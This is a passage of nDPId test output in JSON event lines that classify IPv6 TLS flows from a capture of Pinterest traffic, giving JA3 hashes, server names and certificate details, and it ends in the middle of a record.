+00496{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":98,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":3,"flow_last_seen":1605289714181,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605289714181,"pkt":"qtsDr8lk5EKm5WPyht1gAI0zACAGQCoBywEgSYsHmR3shSjf9ikqBE5CAB0AAAAAAAAAAACElngBu4oDE2bprOc6gBAB+9UUAAABAQgK1mIgKsK5Ifs="} +00946{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":99,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605289714142,"flow_last_seen":1605289714181,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605289714181,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a04:4e42:1d::84","src_port":38516,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Pinterest","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"s.pinimg.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00947{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":100,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605289714142,"flow_last_seen":1605289714182,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605289714182,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a04:4e42:1d::84","src_port":38514,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Pinterest","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"s.pinimg.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00947{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":101,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605289714142,"flow_last_seen":1605289714182,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605289714182,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a04:4e42:1d::84","src_port":38522,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Pinterest","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"s.pinimg.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00947{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":102,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605289714142,"flow_last_seen":1605289714182,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605289714182,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a04:4e42:1d::84","src_port":38520,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Pinterest","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"s.pinimg.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +01003{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":104,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605289714142,"flow_last_seen":1605289714204,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":1905,"flow_avg_l4_payload_len":317,"midstream":0,"thread_ts_msec":1605289714204,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a04:4e42:1d::84","src_port":38512,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Pinterest","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"s.pinimg.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +02783{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":107,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":9,"flow_first_seen":1605289714142,"flow_last_seen":1605289714204,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":5839,"flow_avg_l4_payload_len":648,"midstream":0,"thread_ts_msec":1605289714204,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a04:4e42:1d::84","src_port":38512,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Pinterest","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"s.pinimg.com","server_names":"*.pinterest.com,pinterest.in,*.pinterest.co,pinterest.co,*.pinterest.pe,pinterest.pe,*.pinterest.be,pinterest.be,*.pinterest.in,*.pinterest.ph,*.pinterest.ec,pinterest.ph,*.pinterest.cl,*.pinimg.com,*.pinterest.es,pinterest.es,*.pinterest.nz,pinterest.nz,pinterest.ec,pinterest.hu,pinterest.ca,pinterest.id,*.pinterest.nl,pinterest.nl,*.pinterest.tw,pinterest.tw,*.pinterest.th,pinterest.th,*.pinterest.id,*.pinterest.vn,*.pinterest.hu,pinterest.vn,*.pinterest.uk,pinterest.uk,*.pinterest.ru,pinterest.ru,*.pinterest.it,pinterest.it,pinterest.fr,pinterest.cl,*.pinterest.fr,*.pinterest.jp,*.pinterest.ca,pinterest.com,pin.it,*.pinterest.se,*.pinterest.pt,*.pinterest.mx,*.pinterest.kr,*.pinterest.ie,pinterest.engineering,*.pinterest.dk,*.pinterest.de,*.pinterest.ch,*.pinterest.at,*.pinterestmail.com,*.pinterest.engineering,*.pinterest.info,pinterest.info,pinimg.com,pinterestmail.com,pinterest.de,pinterest.dk,pinterest.ie,pinterest.jp,pinterest.kr,pinterest.mx,pinterest.pt,pinterest.se,pinterest.at,pinterest.ch,pinterest.co.at,*.pinterest.com.uy,pinterest.co.kr,pinterest.co.uk,*.pinterest.com.au,pinterest.com.au,pinterest.com.mx,*.pinterest.co.nz,pinterest.co.nz,pinterest.com.pe,pinterest.com.uy,*.pinterest.co.in,pinterest.com.py,*.pinterest.com.py,pinterest.com.bo,*.pinterest.com.bo,pinterest.com.ec,*.pinterest.com.ec,pinterest.co.in,*.pinterest.com.pe,*.pinterest.com.mx,pinterest.com.vn,*.pinterest.com.vn,*.pinterest.co.uk,*.pinterest.co.kr,*.pinterest.co.at,*.testing.pinterest.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=DigiCert Inc, OU=www.digicert.com, CN=DigiCert SHA2 High Assurance Server CA","subjectDN":"C=US, ST=California, L=San Francisco, O=Pinterest, Inc., CN=*.pinterest.com","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"1E:D0:5D:9F:0D:82:46:B3:60:5F:11:FB:64:D5:28:35:37:40:7A:4E"}} +01003{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":127,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1605289714142,"flow_last_seen":1605289714229,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":1905,"flow_avg_l4_payload_len":272,"midstream":0,"thread_ts_msec":1605289714229,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a04:4e42:1d::84","src_port":38518,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Pinterest","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"s.pinimg.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +02784{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":131,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1605289714142,"flow_last_seen":1605289714229,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":5839,"flow_avg_l4_payload_len":583,"midstream":0,"thread_ts_msec":1605289714229,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a04:4e42:1d::84","src_port":38518,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Pinterest","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"s.pinimg.com","server_names":"*.pinterest.com,pinterest.in,*.pinterest.co,pinterest.co,*.pinterest.pe,pinterest.pe,*.pinterest.be,pinterest.be,*.pinterest.in,*.pinterest.ph,*.pinterest.ec,pinterest.ph,*.pinterest.cl,*.pinimg.com,*.pinterest.es,pinterest.es,*.pinterest.nz,pinterest.nz,pinterest.ec,pinterest.hu,pinterest.ca,pinterest.id,*.pinterest.nl,pinterest.nl,*.pinterest.tw,pinterest.tw,*.pinterest.th,pinterest.th,*.pinterest.id,*.pinterest.vn,*.pinterest.hu,pinterest.vn,*.pinterest.uk,pinterest.uk,*.pinterest.ru,pinterest.ru,*.pinterest.it,pinterest.it,pinterest.fr,pinterest.cl,*.pinterest.fr,*.pinterest.jp,*.pinterest.ca,pinterest.com,pin.it,*.pinterest.se,*.pinterest.pt,*.pinterest.mx,*.pinterest.kr,*.pinterest.ie,pinterest.engineering,*.pinterest.dk,*.pinterest.de,*.pinterest.ch,*.pinterest.at,*.pinterestmail.com,*.pinterest.engineering,*.pinterest.info,pinterest.info,pinimg.com,pinterestmail.com,pinterest.de,pinterest.dk,pinterest.ie,pinterest.jp,pinterest.kr,pinterest.mx,pinterest.pt,pinterest.se,pinterest.at,pinterest.ch,pinterest.co.at,*.pinterest.com.uy,pinterest.co.kr,pinterest.co.uk,*.pinterest.com.au,pinterest.com.au,pinterest.com.mx,*.pinterest.co.nz,pinterest.co.nz,pinterest.com.pe,pinterest.com.uy,*.pinterest.co.in,pinterest.com.py,*.pinterest.com.py,pinterest.com.bo,*.pinterest.com.bo,pinterest.com.ec,*.pinterest.com.ec,pinterest.co.in,*.pinterest.com.pe,*.pinterest.com.mx,pinterest.com.vn,*.pinterest.com.vn,*.pinterest.co.uk,*.pinterest.co.kr,*.pinterest.co.at,*.testing.pinterest.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=DigiCert Inc, OU=www.digicert.com, CN=DigiCert SHA2 High Assurance Server CA","subjectDN":"C=US, ST=California, L=San Francisco, O=Pinterest, Inc., CN=*.pinterest.com","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"1E:D0:5D:9F:0D:82:46:B3:60:5F:11:FB:64:D5:28:35:37:40:7A:4E"}} +01003{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":134,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1605289714142,"flow_last_seen":1605289714229,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":1905,"flow_avg_l4_payload_len":272,"midstream":0,"thread_ts_msec":1605289714229,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a04:4e42:1d::84","src_port":38516,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Pinterest","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"s.pinimg.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +01003{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":135,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1605289714142,"flow_last_seen":1605289714229,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":1905,"flow_avg_l4_payload_len":272,"midstream":0,"thread_ts_msec":1605289714229,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a04:4e42:1d::84","src_port":38522,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Pinterest","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"s.pinimg.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +02784{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":138,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1605289714142,"flow_last_seen":1605289714229,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":5839,"flow_avg_l4_payload_len":583,"midstream":0,"thread_ts_msec":1605289714229,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a04:4e42:1d::84","src_port":38522,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Pinterest","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"s.pinimg.com","server_names":"*.pinterest.com,pinterest.in,*.pinterest.co,pinterest.co,*.pinterest.pe,pinterest.pe,*.pinterest.be,pinterest.be,*.pinterest.in,*.pinterest.ph,*.pinterest.ec,pinterest.ph,*.pinterest.cl,*.pinimg.com,*.pinterest.es,pinterest.es,*.pinterest.nz,pinterest.nz,pinterest.ec,pinterest.hu,pinterest.ca,pinterest.id,*.pinterest.nl,pinterest.nl,*.pinterest.tw,pinterest.tw,*.pinterest.th,pinterest.th,*.pinterest.id,*.pinterest.vn,*.pinterest.hu,pinterest.vn,*.pinterest.uk,pinterest.uk,*.pinterest.ru,pinterest.ru,*.pinterest.it,pinterest.it,pinterest.fr,pinterest.cl,*.pinterest.fr,*.pinterest.jp,*.pinterest.ca,pinterest.com,pin.it,*.pinterest.se,*.pinterest.pt,*.pinterest.mx,*.pinterest.kr,*.pinterest.ie,pinterest.engineering,*.pinterest.dk,*.pinterest.de,*.pinterest.ch,*.pinterest.at,*.pinterestmail.com,*.pinterest.engineering,*.pinterest.info,pinterest.info,pinimg.com,pinterestmail.com,pinterest.de,pinterest.dk,pinterest.ie,pinterest.jp,pinterest.kr,pinterest.mx,pinterest.pt,pinterest.se,pinterest.at,pinterest.ch,pinterest.co.at,*.pinterest.com.uy,pinterest.co.kr,pinterest.co.uk,*.pinterest.com.au,pinterest.com.au,pinterest.com.mx,*.pinterest.co.nz,pinterest.co.nz,pinterest.com.pe,pinterest.com.uy,*.pinterest.co.in,pinterest.com.py,*.pinterest.com.py,pinterest.com.bo,*.pinterest.com.bo,pinterest.com.ec,*.pinterest.com.ec,pinterest.co.in,*.pinterest.com.pe,*.pinterest.com.mx,pinterest.com.vn,*.pinterest.com.vn,*.pinterest.co.uk,*.pinterest.co.kr,*.pinterest.co.at,*.testing.pinterest.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=DigiCert Inc, OU=www.digicert.com, CN=DigiCert SHA2 High Assurance Server CA","subjectDN":"C=US, ST=California, L=San Francisco, O=Pinterest, Inc., CN=*.pinterest.com","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"1E:D0:5D:9F:0D:82:46:B3:60:5F:11:FB:64:D5:28:35:37:40:7A:4E"}} +01003{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":141,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1605289714142,"flow_last_seen":1605289714229,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":1905,"flow_avg_l4_payload_len":272,"midstream":0,"thread_ts_msec":1605289714229,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a04:4e42:1d::84","src_port":38514,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Pinterest","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"s.pinimg.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +02784{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":149,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":13,"flow_first_seen":1605289714142,"flow_last_seen":1605289714230,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":5839,"flow_avg_l4_payload_len":449,"midstream":0,"thread_ts_msec":1605289714230,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a04:4e42:1d::84","src_port":38516,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Pinterest","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"s.pinimg.com","server_names":"*.pinterest.com,pinterest.in,*.pinterest.co,pinterest.co,*.pinterest.pe,pinterest.pe,*.pinterest.be,pinterest.be,*.pinterest.in,*.pinterest.ph,*.pinterest.ec,pinterest.ph,*.pinterest.cl,*.pinimg.com,*.pinterest.es,pinterest.es,*.pinterest.nz,pinterest.nz,pinterest.ec,pinterest.hu,pinterest.ca,pinterest.id,*.pinterest.nl,pinterest.nl,*.pinterest.tw,pinterest.tw,*.pinterest.th,pinterest.th,*.pinterest.id,*.pinterest.vn,*.pinterest.hu,pinterest.vn,*.pinterest.uk,pinterest.uk,*.pinterest.ru,pinterest.ru,*.pinterest.it,pinterest.it,pinterest.fr,pinterest.cl,*.pinterest.fr,*.pinterest.jp,*.pinterest.ca,pinterest.com,pin.it,*.pinterest.se,*.pinterest.pt,*.pinterest.mx,*.pinterest.kr,*.pinterest.ie,pinterest.engineering,*.pinterest.dk,*.pinterest.de,*.pinterest.ch,*.pinterest.at,*.pinterestmail.com,*.pinterest.engineering,*.pinterest.info,pinterest.info,pinimg.com,pinterestmail.com,pinterest.de,pinterest.dk,pinterest.ie,pinterest.jp,pinterest.kr,pinterest.mx,pinterest.pt,pinterest.se,pinterest.at,pinterest.ch,pinterest.co.at,*.pinterest.com.uy,pinterest.co.kr,pinterest.co.uk,*.pinterest.com.au,pinterest.com.au,pinterest.com.mx,*.pinterest.co.nz,pinterest.co.nz,pinterest.com.pe,pinterest.com.uy,*.pinterest.co.in,pinterest.com.py,*.pinterest.com.py,pinterest.com.bo,*.pinterest.com.bo,pinterest.com.ec,*.pinterest.com.ec,pinterest.co.in,*.pinterest.com.pe,*.pinterest.com.mx,pinterest.com.vn,*.pinterest.com.vn,*.pinterest.co.uk,*.pinterest.co.kr,*.pinterest.co.at,*.testing.pinterest.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=DigiCert Inc, OU=www.digicert.com, CN=DigiCert SHA2 High Assurance Server CA","subjectDN":"C=US, ST=California, L=San Francisco, O=Pinterest, Inc., CN=*.pinterest.com","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"1E:D0:5D:9F:0D:82:46:B3:60:5F:11:FB:64:D5:28:35:37:40:7A:4E"}} +02784{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":150,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":11,"flow_first_seen":1605289714142,"flow_last_seen":1605289714230,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":5839,"flow_avg_l4_payload_len":530,"midstream":0,"thread_ts_msec":1605289714230,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a04:4e42:1d::84","src_port":38514,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Pinterest","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"s.pinimg.com","server_names":"*.pinterest.com,pinterest.in,*.pinterest.co,pinterest.co,*.pinterest.pe,pinterest.pe,*.pinterest.be,pinterest.be,*.pinterest.in,*.pinterest.ph,*.pinterest.ec,pinterest.ph,*.pinterest.cl,*.pinimg.com,*.pinterest.es,pinterest.es,*.pinterest.nz,pinterest.nz,pinterest.ec,pinterest.hu,pinterest.ca,pinterest.id,*.pinterest.nl,pinterest.nl,*.pinterest.tw,pinterest.tw,*.pinterest.th,pinterest.th,*.pinterest.id,*.pinterest.vn,*.pinterest.hu,pinterest.vn,*.pinterest.uk,pinterest.uk,*.pinterest.ru,pinterest.ru,*.pinterest.it,pinterest.it,pinterest.fr,pinterest.cl,*.pinterest.fr,*.pinterest.jp,*.pinterest.ca,pinterest.com,pin.it,*.pinterest.se,*.pinterest.pt,*.pinterest.mx,*.pinterest.kr,*.pinterest.ie,pinterest.engineering,*.pinterest.dk,*.pinterest.de,*.pinterest.ch,*.pinterest.at,*.pinterestmail.com,*.pinterest.engineering,*.pinterest.info,pinterest.info,pinimg.com,pinterestmail.com,pinterest.de,pinterest.dk,pinterest.ie,pinterest.jp,pinterest.kr,pinterest.mx,pinterest.pt,pinterest.se,pinterest.at,pinterest.ch,pinterest.co.at,*.pinterest.com.uy,pinterest.co.kr,pinterest.co.uk,*.pinterest.com.au,pinterest.com.au,pinterest.com.mx,*.pinterest.co.nz,pinterest.co.nz,pinterest.com.pe,pinterest.com.uy,*.pinterest.co.in,pinterest.com.py,*.pinterest.com.py,pinterest.com.bo,*.pinterest.com.bo,pinterest.com.ec,*.pinterest.com.ec,pinterest.co.in,*.pinterest.com.pe,*.pinterest.com.mx,pinterest.com.vn,*.pinterest.com.vn,*.pinterest.co.uk,*.pinterest.co.kr,*.pinterest.co.at,*.testing.pinterest.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=DigiCert Inc, OU=www.digicert.com, CN=DigiCert SHA2 High Assurance Server CA","subjectDN":"C=US, ST=California, L=San Francisco, O=Pinterest, Inc., CN=*.pinterest.com","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"1E:D0:5D:9F:0D:82:46:B3:60:5F:11:FB:64:D5:28:35:37:40:7A:4E"}} +01003{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":151,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1605289714142,"flow_last_seen":1605289714230,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":1905,"flow_avg_l4_payload_len":272,"midstream":0,"thread_ts_msec":1605289714230,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a04:4e42:1d::84","src_port":38520,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Pinterest","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"s.pinimg.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +02784{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":154,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1605289714142,"flow_last_seen":1605289714230,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":5839,"flow_avg_l4_payload_len":583,"midstream":0,"thread_ts_msec":1605289714230,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a04:4e42:1d::84","src_port":38520,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Pinterest","breed":"Fun","category":"SocialNetwork"},"tls": 